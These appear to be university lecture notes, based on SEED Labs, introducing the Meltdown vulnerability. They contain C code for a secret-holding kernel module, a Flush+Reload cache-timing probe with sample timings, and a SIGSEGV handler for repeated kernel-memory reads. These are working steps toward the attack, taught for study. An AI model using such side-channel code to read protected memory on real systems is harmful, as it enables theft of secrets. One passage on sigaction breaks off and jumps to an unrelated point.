|
|
Meltdown is a hardware vulnerability that affected Intel x86 CPUs, IBM POWER
CPUs, and some ARM-based CPUs. It allowed a malicious process to read all
memory, even when it is not authorized to do so.
Meltdown affected a wide range of systems. At the time of disclosure (2018), this
included all devices running any but the most recent and patched versions of
iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud
services were impacted, as well as a potential majority of smart devices and
embedded devices using ARM-based CPUs (mobile devices, smart TVs, printers
and others), including a wide range of networking equipment.
It was disclosed in conjunction with another exploit, Spectre, with which it
shares some characteristics. The Meltdown and Spectre vulnerabilities were
considered "catastrophic" by security analysts. The vulnerabilities were so
severe that security researchers initially believed the reports to be false.
In 2018, Intel is reported to have added hardware and firmware mitigations
regarding Spectre and Meltdown vulnerabilities to its latest processors.
|
For two lectures, we will show how meltdown attack works.
Acknowledgements.
The lecture notes are inspired by the SEED
Labs.
Testing environments.
The attack has been tested under the following environments:
- VMware Workstation 15 Player.
- OS: Ubuntu 16.04.1. 64-bit (kernel version: 4.4.0-31-generic).
- CPU: Intel CPU i5-6300U (released in 2015)
Setting the Context: Reading Kernel Memory?
We first create and insert a kernel module. Then, we will create an attack
program that tries to read the secret data.
Creating and inserting a kernel module
First let's check the following code:
// mdown_kernel.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/uaccess.h>
static char secret[] = "Go Navy!";
static void* buf;
static int mdown_open(struct inode *inode, struct file *file)
{
return single_open(file, NULL, PDE_DATA(inode));
}
static ssize_t mdown_read(struct file *filp, char *buffer,
size_t length, loff_t *offset)
{
memcpy(buf, &secret, sizeof(secret));
return sizeof(secret);
}
|
static const struct file_operations mdown_fops =
{
.owner = THIS_MODULE,
.open = mdown_open,
.read = mdown_read,
.llseek = seq_lseek,
.release = single_release,
};
static __init int mdown_init(void)
{
// print into the kernel message buffer
printk("secret data address: 0x%p\n", &secret);
buf = (char*)vmalloc(sizeof(secret));
proc_create_data("secret_data", 0444, NULL, &mdown_fops, NULL);
return 0;
}
static __exit void mdown_cleanup(void)
{
remove_proc_entry("secret_data", NULL);
}
module_init(mdown_init);
module_exit(mdown_cleanup);
|
To compile the code, we will create Makefile as follows:
KVERS = $(shell uname -r)
obj-m += mdown_kernel.o
all:
make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
Now, let's compile the code.
~$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432 modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
Building modules, stage 2.
MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'
Then, the compiler will have created mdown_kernel.ko. We can insert
this module in the kernel as follows:
~$ sudo insmod mdown_kernel.ko
Note that in mdown_init, there is a function call to
printk. This can be checked by command dmesg.
~$ dmesg | grep secret
[ 400.054528] secret data address: 0xffffffffc0232000
Naive trial that won't work
Let's try to read the data at address 0xffffffffc0232000.
// atk_naive.c
#include <stdio.h>
int main()
{
printf("address: ");
char* p;
scanf("%p", &p);
printf("reading address at 0x%p...\n", p);
printf("%d %c\n", *p, *p);
return 0;
}
Let's compile and run the program:
~$ gcc atk_naive.c -o atk_naive
~$ ./atk_naive
address: 0xffffffffc0232000
reading address at 0x0xffffffffc0232000...
Segmentation fault (core dumped)
As expected, a normal program cannot read any data in the kernel region.
How can a normal program read kernel data? Is this even possible?
The meltdown attack answers this question affirmatively!
Interesting Puzzle
Consider code that performs the following:
- Prepare an array.
- Read a number (from 0 to 9) from a secret file.
- change the array based on the number.
- Change the array back to its original state.
In particular, consider the code on the right.
Can you figure out the secret?
- You can add code.
- Of course, you are not allowed to read the secret file again.
- Of course, you are not allowed to store the letter in some other variable.
|
#include <stdio.h>
int main()
{
// 1. Prepare an array
char A[10*4096];
for(int i=0; i<10; i++)
A[i*4096] = 1;
// 2. Read a number from a secret file
int n;
FILE* f = fopen("secret.txt", "r");
fscanf(f, "%d", &n);
fclose(f);
// ???? code ????
// 3. Change the array based on the number
A[n*4096] = 2;
// 4. Revert the array state
A[n*4096] = 1;
n = -1;
// ???? code ????
return 0;
}
|
Solution to the puzzle
The idea is as follows:
The cache side-channel attack!
What is the side information that the cache leaks?
- A recently access item will be residing in the cache.
- If you try to access that item in the cache, you can access it fast.
- If you try to access an item no in the cache, you will have a slower access time.
So, here is the code we will add:
- Before changing the array, flush the cache for all potential items.
- In the end, do the following:
- For each item, try accessing it and measure the access time.
The item with the minimum access time will be probably the secret number!
Here's the sample run of the code on the right.
~$ gcc sol_puzzle.c
~$ ./a.out
Access time for array[0*4096]: 184 CPU cycles
Access time for array[1*4096]: 220 CPU cycles
Access time for array[2*4096]: 194 CPU cycles
Access time for array[3*4096]: 218 CPU cycles
Access time for array[4*4096]: 218 CPU cycles
Access time for array[5*4096]: 212 CPU cycles
Access time for array[6*4096]: 36 CPU cycles
Access time for array[7*4096]: 222 CPU cycles
Access time for array[8*4096]: 194 CPU cycles
Access time for array[9*4096]: 218 CPU cycles
~$ cat secret.txt
6
The access time for item 6 has the minimum access time, which matches the secret number!
|
|
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <emmintrin.h>
#include <x86intrin.h>
int main()
{
// 1. Prepare an array
char A[10*4096];
for(int i=0; i<10; i++)
A[i*4096] = 1;
// 2. Read a number from a secret file
int n;
FILE* f = fopen("secret.txt", "r");
fscanf(f, "%d", &n);
fclose(f);
// *********** Flush the cache for every element *********
for(int i=0; i<10; i++)
_mm_clflush(&A[i*4096]);
// 3. Change the array based on the number.
A[n*4096] = 2;
// 4. Revert the array state
A[n*4096] = 1;
n = -1;
// **** Measure access time for each possibility ****
char* addr;
int dummy;
register uint64_t time1, time2;
for(int i=0; i<10; i++) {
addr = &A[i*4096];
time1 = __rdtscp(&dummy);
dummy = *addr;
time2 = __rdtscp(&dummy);
printf("Access time for array[%d*4096]: %lu CPU cycles\n",
i, time2-time1);
}
return 0;
}
|
Of course, it's not at all clear at this moment how to take advantage of the
cache side-channel. But, at least, this is a good direction. We will revisit
this idea and develop into the actual attack in the next lecture.
Making the Probing Program Avoid Crashing
Another problem that we have to deal with is that our probing program just
dies. This is because the program gets the signal SIGSEGV (segmentation fault
signal). By handling this signal, we can make the program move on without
crashing.
Signal handler and sigaction()
The first argument is the signal to be handled, while the second and third
arguments are references to a struct sigaction. It is in the
struct sigaction that we set the handler function and additional
arguments. It has the following members:
Why do we need this? It is because the access time is a noisy measure. To get
better accuracy in estimation, we need to measure the access time in many
iterations. In the code below, we will control the number iterations by
using a global variable trial.
// atk_repeat.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/signal.h>
int trial = 0;
char* p;
void try()
{
trial++;
printf("reading address at 0x%p...\n", p);
printf("%d %c\n", *p, *p);
}
void catch_segv(int signum)
{
if( trial < 5)
try();
else
exit(0); // now it's time to end the program
}
int main()
{
printf("address: ");
scanf("%p", &p);
struct sigaction action;
action.sa_flags = SA_NODEFER;
action.sa_handler = catch_segv;
sigaction(SIGSEGV, &action, NULL);
try();
return 0;
}
|
|
To make things simpler, the code uses global variables:
-
trial: This keeps track of how many trials have been attempted
so far.
-
p: The address that the user provides.
The function try() will try to access a kernel region. It will
certainly create a SIGSEGV signal.
Due to the sigaction call in the main() function, the
SIGSEGV signal will be handled by catch_segv(). As explained
above, this procedure will be repeated recursively until trial
becomes large enough.
The sample run is shown below:
~$ ./atk_repeat
address: 0xffffffffc0232000
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
reading address at 0x0xffffffffc0232000...
|
|